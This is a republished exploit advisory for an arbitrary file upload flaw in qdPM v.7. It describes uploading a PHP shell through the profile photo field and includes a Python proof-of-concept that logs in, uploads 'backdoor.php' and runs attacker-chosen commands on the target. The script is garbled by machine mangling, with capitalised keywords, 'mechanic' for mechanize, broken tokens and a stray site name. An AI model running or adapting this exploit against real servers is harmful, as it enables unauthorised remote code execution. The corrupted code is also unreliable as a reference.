QdPM v.7 Arbitrary File Upload

Title: qdPM v.7 Arbitrary File upload
Author: loneferret
Affected Versions: 7
Developer URL: http://qdpm.net/
Test System Platform: Winddows XP/XAMPP
Program introduction:
# Free project management tool for small team
# QdPM is a free web-based project management tool suitable for a small team working on multiple projects.
# It is fully retriable. You can easy manage Projects, Tasks and People. MERs interact
# Using a Ticket System that is integrated into Task management.
 
Defect Analysis:
# Application does not verify the file's extension when uploading an image for a user's profile.
# Making it possible to upload a small php shell, and accessing it remotely.
 
# Note (s ):
# One needs a valid user account to upload the file. (Client will do)
# No need to be authenticated to access the file.
 
Upload files:
After logging on, upload the file here:
# Page:/qdPM/index. php/home/myAccount
 
# Access file:
# File can be found here:
#/QdPM/uploads/users/<filename>
#
# Note the filename will contain a random number. One need
# To look at the source code from the browser to find it.
# For example: <input type = "file" name = "users [photo]" value = "171793-backdoor.php" id = "users_photo"/>
 
 
 
----- Python script -----
#! /Usr/bin/python
 
Import re, mechanic
Import urllib, sys
Www.2cto.com
Print "\ n [*] qdPM v.7 Remote Code Execution"
Print "[*] Vulnerability discovered by loneferret"
 
Print "[*] Offensive Security-http://www.offensive-security.com \ n"
If (len (sys. argv )! = 3 ):
Print "[*] Usage: poc. py <RHOST> <RCMD>"
Exit (0)
 
Rhost = sys. argv [1]
Rcmd = sys. argv [2]
 
# Login into site
Try:
Print "[*] Loging in ."
Br = mechanic. Browser ()
Br. open ("http: // % s/qdPM/index. php/home/login" % rhost)
Assert br. viewing_html ()
Br. select_form (name = "UsersForm ")
Br. select_form (nr = 0)
Br. form ['login [email] '] = "loneferret@test.com"
Br. form ['login [password] '] = "123456"
Print "[*] Hope this works"
Br. submit ()
 
Except t:
Print "[*] Oups ..."
Exit (0)
 
# Upload malicious file
Try:
Print "[*] Uploading shell .."
Br. open ("http: // % s/qdPM/home/myAccount" % rhost)
Assert br. viewing_html ()
Br. select_form (name = "UsersAccountForm ")
Br. select_form (nr = 0)
Br. form. add_file (open ('backdoor. php'), "text/plain", "backdoor. php", name = "users [photo]")
Br. submit (nr = 0)
 
Except t:
Print "[-] Upload didn't work ."
Exit (0)
 
# Get file name once saved
Try:
Br. select_form (name = "UsersAccountForm ")
For form in br. forms ():
Filename = form. controls [9]. value
Print "[*] Filename is now:" + filename
 
Url = "http: // % s/qdPM/uploads/users" % rhost
Url + = "/% s? Cmd = % s "% (filename, rcmd)
Print "[*] Executing command: \ n"
Resp = urllib. urlopen (url)
Print resp. read ()
 
Except t:
Print "[-] Oups ..."
Exit (0)